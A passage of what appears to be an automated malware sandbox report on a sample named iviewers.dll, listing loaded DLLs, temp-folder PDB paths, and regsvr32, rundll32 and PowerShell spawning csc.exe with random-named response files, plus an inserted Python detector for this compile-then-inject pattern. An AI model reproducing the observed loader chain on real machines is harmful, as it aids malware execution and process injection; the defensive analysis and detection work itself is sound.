            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: dpapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: apphelp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: aclayers.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mpr.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc_os.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wldp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: winhttp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
            Source: C:\Windows\System32\loaddll32.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\regsvr32.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: iviewers.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: iviewers.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: q8C:\Users\user\AppData\Local\Temp\rcv5n2si\rcv5n2si.pdb source: powershell.exe, 0000001B.00000002.1650397592.0000000004D20000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\tkky4heb\tkky4heb.pdb source: powershell.exe, 0000000F.00000002.1629065195.0000000006DEA000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: q8C:\Users\user\AppData\Local\Temp\ljtzeyvh\ljtzeyvh.pdb source: powershell.exe, 0000000D.00000002.1589335298.00000000058FC000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: q8C:\Users\user\AppData\Local\Temp\tkky4heb\tkky4heb.pdb source: powershell.exe, 0000000F.00000002.1605796075.0000000004C02000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: q8C:\Users\user\AppData\Local\Temp\ceo01y5g\ceo01y5g.pdb source: loaddll32.exe, 00000000.00000002.1679599025.0000000002731000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: q8C:\Users\user\AppData\Local\Temp\zhytdsxg\zhytdsxg.pdb source: rundll32.exe, 00000005.00000002.1636762344.00000000051F1000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: q8C:\Users\user\AppData\Local\Temp\snjgawjs\snjgawjs.pdb source: regsvr32.exe, 00000004.00000002.1626426593.00000000046C1000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: q8C:\Users\user\AppData\Local\Temp\ceo01y5g\ceo01y5g.pdb@\ source: loaddll32.exe, 00000000.00000002.1679599025.0000000002731000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: q8C:\Users\user\AppData\Local\Temp\pejlabp5\pejlabp5.pdb source: powershell.exe, 00000014.00000002.1570488674.00000000055FD000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: q8C:\Users\user\AppData\Local\Temp\shgzzqqc\shgzzqqc.pdb source: rundll32.exe, 00000006.00000002.1588613450.0000000004761000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\pejlabp5\pejlabp5.pdb9&7v source: powershell.exe, 00000014.00000002.1579325198.00000000079E6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\pejlabp5\pejlabp5.pdb8'8w source: powershell.exe, 00000014.00000002.1579325198.00000000079E6000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\snjgawjs\snjgawjs.cmdline"
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zhytdsxg\zhytdsxg.cmdline"
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\shgzzqqc\shgzzqqc.cmdline"
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ceo01y5g\ceo01y5g.cmdline"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ljtzeyvh\ljtzeyvh.cmdline"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tkky4heb\tkky4heb.cmdline"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pejlabp5\pejlabp5.cmdline"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rcv5n2si\rcv5n2si.cmdline"
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\iviewers.dll
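            The csc.exe launches listed above all follow the .NET CodeDom / PowerShell Add-Type pattern: a parent that has no business compiling code (regsvr32.exe, rundll32.exe, loaddll32.exe, powershell.exe) starts csc.exe with /noconfig /fullpaths and a response file at %TEMP%\<8 random chars>\<same 8 chars>.cmdline, and csc.exe then drops <same 8 chars>.dll (and a .pdb) in that directory. The Python below is an added detection example for this page, not Joe Sandbox code and not part of the sample: it parses rows in this report's run-together "Source: ...exeProcess created: ..." / "...exeFile created: ..." format, flags compile cradles whose parent is not a known build tool, and correlates each one with the DLL/PDB artefacts csc.exe wrote. The sample rows are constructed copies modelled on the lines above, and the BUILD_PARENTS allowlist is an assumption to tune per environment.

```python
import re
from collections import defaultdict

# Assumption for this example: parents that legitimately drive csc.exe during builds. Tune per estate.
BUILD_PARENTS = {"msbuild.exe", "devenv.exe", "dotnet.exe", "vbcscompiler.exe"}

# Report rows run the source image and the event text together ("...exeProcess created: ...") and may
# end with the page's "Jump to behavior" / "Jump to dropped file" link text, which we discard.
PROC_RE = re.compile(r"Source:\s*(?P<parent>.+?\.exe)Process created:\s*(?P<cmd>.+?)(?:Jump to behavior)?$")
FILE_RE = re.compile(r"Source:\s*(?P<proc>.+?\.exe)File created:\s*(?P<path>.+?)(?:Jump to dropped file)?$")

# CodeDom / Add-Type temp layout: %TEMP%\<8 chars>\<same 8 chars>.cmdline, with .dll/.pdb siblings.
RESPONSE_RE = re.compile(r'@"(?P<path>[^"]*\\Temp\\(?P<dir>[a-z0-9]{8})\\(?P<stem>[a-z0-9]{8})\.cmdline)"', re.I)
ARTIFACT_RE = re.compile(r"\\Temp\\(?P<dir>[a-z0-9]{8})\\(?P<stem>[a-z0-9]{8})\.(?:dll|pdb)$", re.I)

# Constructed sample rows modelled on this report's "Process created" / "File created" lines.
SAMPLE_LINES = [
    r'Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\snjgawjs\snjgawjs.cmdline"',
    r'Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zhytdsxg\zhytdsxg.cmdline"Jump to behavior',
    r'Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ljtzeyvh\ljtzeyvh.cmdline"',
    # Constructed benign build (not from the report): allow-listed parent and a project response file.
    r'Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig @"C:\src\app\obj\Debug\app.cmdline"',
    r'Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\snjgawjs\snjgawjs.dllJump to dropped file',
    r'Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\snjgawjs\snjgawjs.pdb',
    r'Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\zhytdsxg\zhytdsxg.dllJump to dropped file',
]


def basename(path: str) -> str:
    """Lower-cased final path component of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def split_command(cmd: str):
    """Return (image, args); the image may be double-quoted or bare."""
    cmd = cmd.strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        return cmd[1:end], cmd[end + 1:].strip()
    image, _, args = cmd.partition(" ")
    return image, args


def compile_cradle_stem(parent: str, image: str, args: str):
    """Return the CodeDom temp stem when a non-build parent compiles from %TEMP%, else None."""
    if basename(image) != "csc.exe" or basename(parent) in BUILD_PARENTS:
        return None
    m = RESPONSE_RE.search(args)
    # CodeDom names the directory and the response file identically; anything else is not this pattern.
    if not m or m["dir"].lower() != m["stem"].lower():
        return None
    return m["stem"].lower()


def correlate(lines):
    """Map each flagged compile stem to its parent image and the .dll/.pdb files csc.exe dropped."""
    hits, dropped = {}, defaultdict(list)
    for raw in lines:
        line = raw.strip()
        if (m := PROC_RE.match(line)):
            image, args = split_command(m["cmd"])
            stem = compile_cradle_stem(m["parent"], image, args)
            if stem:
                hits[stem] = {"parent": basename(m["parent"]), "artifacts": []}
        elif (m := FILE_RE.match(line)):
            a = ARTIFACT_RE.search(m["path"])
            if a and a["dir"].lower() == a["stem"].lower():
                dropped[a["stem"].lower()].append(basename(m["path"]))
    for stem, info in hits.items():
        info["artifacts"] = sorted(dropped.get(stem, []))
    return hits


if __name__ == "__main__":
    for stem, info in correlate(SAMPLE_LINES).items():
        print(f"{stem}: csc.exe spawned by {info['parent']}, dropped {info['artifacts'] or 'nothing seen'}")
```

            The directory-equals-stem check is what separates this from an ordinary build: the eight-character name is generated per compile, so a hunt keyed on the stem ties the process-creation row, the .cmdline response file, the dropped DLL and the PDB path seen in memory (the "Binary string" rows above) to one Add-Type invocation, which is the pivot to use when a compile cradle is followed by injection into RegAsm.exe as in this report.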
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0374330D push ecx; iretd 13_2_037432FC
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_037432DD push ecx; iretd 13_2_037432FC
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_03743ACD push ebx; retf 13_2_03743ADA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0043D810 push eax; mov dword ptr [esp], 707F7E0Dh31_2_0043D812
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_00443469 push ebp; iretd 31_2_0044346C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0044366E push 9F00CD97h; ret 31_2_004436B1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0043AE30 push eax; mov dword ptr [esp], 1D1E1F10h31_2_0043AE3E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_004477A5 push ebp; iretd 31_2_004477AA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 35_2_011E754E pushad ; retf 35_2_011E756C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 35_2_011EB976 push esi; ret 35_2_011EB9D1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 35_2_011EC7FA pushad ; retf 35_2_011EC827
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 35_2_011F8996 pushad ; retf 35_2_011F89B4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 41_2_010B4B24 push esp; retf 41_2_010B4B29
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 41_2_010BE9D7 push ds; retf 41_2_010BE9D8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 41_2_010B52E0 pushfd ; iretd 41_2_010B52E5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 41_2_010BEDF7 push ds; retf 41_2_010BEDF8
